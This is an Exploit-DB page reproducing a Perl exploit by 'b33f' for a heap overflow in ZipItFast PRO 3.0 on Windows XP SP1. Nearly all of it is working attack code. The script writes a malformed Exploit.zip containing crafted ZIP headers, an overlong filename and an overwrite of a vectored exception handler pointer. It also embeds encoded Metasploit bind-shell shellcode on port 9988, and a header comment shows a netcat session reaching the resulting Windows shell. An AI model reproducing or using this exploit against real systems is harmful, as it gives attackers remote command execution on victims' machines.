ZipItFast PRO 3.0 – Local Heap Overflow

  • 作者: b33f
    日期: 2012-07-12
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/19776/
  • #!/usr/bin/perl
    
    #---------------------------------------------------------------------------#
    # Exploit: ZipItFast PRO v3.0 Heap-Overflow #
    # Author: b33f - http://www.fuzzysecurity.com/#
    # OS: Windows XP SP1#
    # DOS POC: C4SS!0 G0M3S => http://www.exploit-db.com/exploits/17512/#
    # Software: https://www.exploit-db.com/apps/#
    # decbc54ffcf644e780a3ef4fcdd27093-zipitfastnow.exe #
    #---------------------------------------------------------------------------#
    # Sorry for reinventing the wheel but learning about heap-overflows #
    # requires you to take a step back and roll with the punches not unlike #
    # watching a David Lynch production ;))...#
    # #
    # - "Who is that lady with the log?"#
    # + "We call her the log-lady.."#
    #---------------------------------------------------------------------------#
    # root@bt:~# nc -nv 192.168.111.131 9988#
    # (UNKNOWN) [192.168.111.131] 9988 (?) open #
    # Microsoft Windows XP [Version 5.1.2600] #
    # (C) Copyright 1985-2001 Microsoft Corp. #
    # #
    # C:\Documents and Settings\Owner\Desktop>#
    #---------------------------------------------------------------------------#
    
    use strict;
    use warnings;
     
    my $filename = "Exploit.zip";
    
    my $head = 
    "\x50\x4B\x03\x04\x14\x00\x00".
    "\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00".
    "\x00\x00\x00\x00\x00\x00\x00\x00".
    "\xe4\x0f".
    "\x00\x00\x00";
     
    my $head2 = 
    "\x50\x4B\x01\x02\x14\x00\x14".
    "\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00".
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00".
    "\xe4\x0f".
    "\x00\x00\x00\x00\x00\x00\x01\x00".
    "\x24\x00\x00\x00\x00\x00\x00\x00";
     
    my $head3 = 
    "\x50\x4B\x05\x06\x00\x00\x00".
    "\x00\x01\x00\x01\x00".
    "\x12\x10\x00\x00".
    "\x02\x10\x00\x00".
    "\x00\x00";
    
    # msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -e x86/alpha_mixed -t
    # [*] x86/alpha_mixed succeeded with size 744 (iteration=1)
    my $ph33r = 
    "\x89\xe2\xda\xd5\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49" .
    "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
    "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
    "\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
    "\x42\x75\x4a\x49\x39\x6c\x39\x78\x4c\x49\x55\x50\x47\x70" .
    "\x55\x50\x35\x30\x6f\x79\x59\x75\x54\x71\x78\x52\x52\x44" .
    "\x6e\x6b\x42\x72\x44\x70\x6e\x6b\x30\x52\x56\x6c\x4e\x6b" .
    "\x30\x52\x35\x44\x4e\x6b\x52\x52\x77\x58\x56\x6f\x68\x37" .
    "\x61\x5a\x46\x46\x64\x71\x79\x6f\x74\x71\x6f\x30\x6c\x6c" .
    "\x75\x6c\x65\x31\x33\x4c\x56\x62\x34\x6c\x31\x30\x6f\x31" .
    "\x4a\x6f\x64\x4d\x73\x31\x6a\x67\x6d\x32\x4c\x30\x70\x52" .
    "\x56\x37\x4e\x6b\x50\x52\x76\x70\x6c\x4b\x61\x52\x77\x4c" .
    "\x73\x31\x6a\x70\x4c\x4b\x37\x30\x52\x58\x6f\x75\x79\x50" .
    "\x72\x54\x73\x7a\x45\x51\x4a\x70\x42\x70\x4c\x4b\x32\x68" .
    "\x65\x48\x6c\x4b\x63\x68\x65\x70\x76\x61\x39\x43\x6b\x53" .
    "\x65\x6c\x77\x39\x4e\x6b\x76\x54\x4c\x4b\x76\x61\x48\x56" .
    "\x76\x51\x49\x6f\x55\x61\x79\x50\x6e\x4c\x6f\x31\x58\x4f" .
    "\x56\x6d\x45\x51\x38\x47\x66\x58\x69\x70\x42\x55\x6a\x54" .
    "\x74\x43\x53\x4d\x5a\x58\x77\x4b\x73\x4d\x64\x64\x33\x45" .
    "\x48\x62\x73\x68\x6e\x6b\x61\x48\x76\x44\x76\x61\x6a\x73" .
    "\x50\x66\x6e\x6b\x46\x6c\x62\x6b\x6c\x4b\x36\x38\x35\x4c" .
    "\x56\x61\x4b\x63\x6c\x4b\x43\x34\x6e\x6b\x33\x31\x7a\x70" .
    "\x6e\x69\x62\x64\x34\x64\x56\x44\x33\x6b\x63\x6b\x50\x61" .
    "\x31\x49\x73\x6a\x72\x71\x79\x6f\x59\x70\x32\x78\x33\x6f" .
    "\x32\x7a\x4e\x6b\x56\x72\x68\x6b\x6b\x36\x43\x6d\x71\x78" .
    "\x47\x43\x55\x62\x47\x70\x67\x70\x71\x78\x53\x47\x42\x53" .
    "\x50\x32\x31\x4f\x46\x34\x53\x58\x70\x4c\x30\x77\x76\x46" .
    "\x47\x77\x6b\x4f\x38\x55\x6f\x48\x6e\x70\x37\x71\x77\x70" .
    "\x77\x70\x65\x79\x6f\x34\x42\x74\x76\x30\x75\x38\x46\x49" .
    "\x6b\x30\x30\x6b\x53\x30\x79\x6f\x4e\x35\x30\x50\x62\x70" .
    "\x62\x70\x52\x70\x33\x70\x42\x70\x51\x50\x42\x70\x72\x48" .
    "\x68\x6a\x74\x4f\x39\x4f\x79\x70\x69\x6f\x4e\x35\x6e\x69" .
    "\x6f\x37\x34\x71\x4b\x6b\x76\x33\x63\x58\x66\x62\x65\x50" .
    "\x35\x77\x55\x54\x6e\x69\x4a\x46\x51\x7a\x56\x70\x33\x66" .
    "\x66\x37\x51\x78\x6f\x32\x39\x4b\x77\x47\x55\x37\x6b\x4f" .
    "\x4b\x65\x66\x33\x31\x47\x50\x68\x4d\x67\x48\x69\x75\x68" .
    "\x4b\x4f\x49\x6f\x4e\x35\x32\x73\x62\x73\x62\x77\x32\x48" .
    "\x43\x44\x68\x6c\x45\x6b\x6d\x31\x6b\x4f\x4e\x35\x42\x77" .
    "\x6f\x79\x78\x47\x52\x48\x62\x55\x70\x6e\x30\x4d\x75\x31" .
    "\x6b\x4f\x59\x45\x53\x58\x50\x63\x62\x4d\x32\x44\x73\x30" .
    "\x4f\x79\x79\x73\x63\x67\x56\x37\x73\x67\x35\x61\x39\x66" .
    "\x51\x7a\x66\x72\x36\x39\x61\x46\x58\x62\x6b\x4d\x63\x56" .
    "\x39\x57\x70\x44\x34\x64\x37\x4c\x53\x31\x57\x71\x4e\x6d" .
    "\x70\x44\x66\x44\x74\x50\x7a\x66\x75\x50\x42\x64\x62\x74" .
    "\x36\x30\x71\x46\x42\x76\x30\x56\x72\x66\x30\x56\x30\x4e" .
    "\x70\x56\x76\x36\x73\x63\x53\x66\x33\x58\x72\x59\x38\x4c" .
    "\x47\x4f\x4c\x46\x59\x6f\x4a\x75\x6f\x79\x59\x70\x50\x4e" .
    "\x53\x66\x71\x56\x59\x6f\x56\x50\x75\x38\x34\x48\x6f\x77" .
    "\x37\x6d\x63\x50\x59\x6f\x79\x45\x4f\x4b\x48\x70\x6c\x75" .
    "\x4c\x62\x31\x46\x45\x38\x6f\x56\x5a\x35\x4d\x6d\x6f\x6d" .
    "\x79\x6f\x5a\x75\x55\x6c\x37\x76\x53\x4c\x45\x5a\x4f\x70" .
    "\x79\x6b\x4d\x30\x43\x45\x73\x35\x4d\x6b\x63\x77\x77\x63" .
    "\x70\x72\x50\x6f\x70\x6a\x77\x70\x61\x43\x59\x6f\x79\x45" .
    "\x41\x41";
    
    my $buf1 = "A" x 4064 . ".txt";
    
    #################
    # EAX => 256-bytes => 0x77fc3210 - 0x04 => 0x77fc320c (_VECTORED_EXCEPTION_NODE)
    # EDX => 260-bytes => 0x0012FA28 - 0x08 => 0x0012FA20 (PTR shellcode)
    # Jump over Blink and Flink => EB 0A
    #################
    my $magic = "\xEB\x0A" . "\x0C\x32\xFC\x77" . "\x20\xFA\x12\x00";
    
    ##################
    # Notice that the offsets don't correspond exactly. I experienced some buffer
    # expansion and compression depending on the buffer structure so keep that in
    # mind if you want to do some testing.
    #
    # Remember to set Anti-Debugging flags in your debugger..
    # (immunity = > !hidedebug All_Debug)
    ##################
    my $buf2 = "\x90" x 253 . $magic . "A" x 300 . $ph33r . "A" x 2756 . ".txt";
    
    my $zip = $head.$buf1.$head2.$buf2.$head3;
    open(FILE,">$filename") || die "[-]Error:\n$!\n";
    print FILE $zip;
    close(FILE);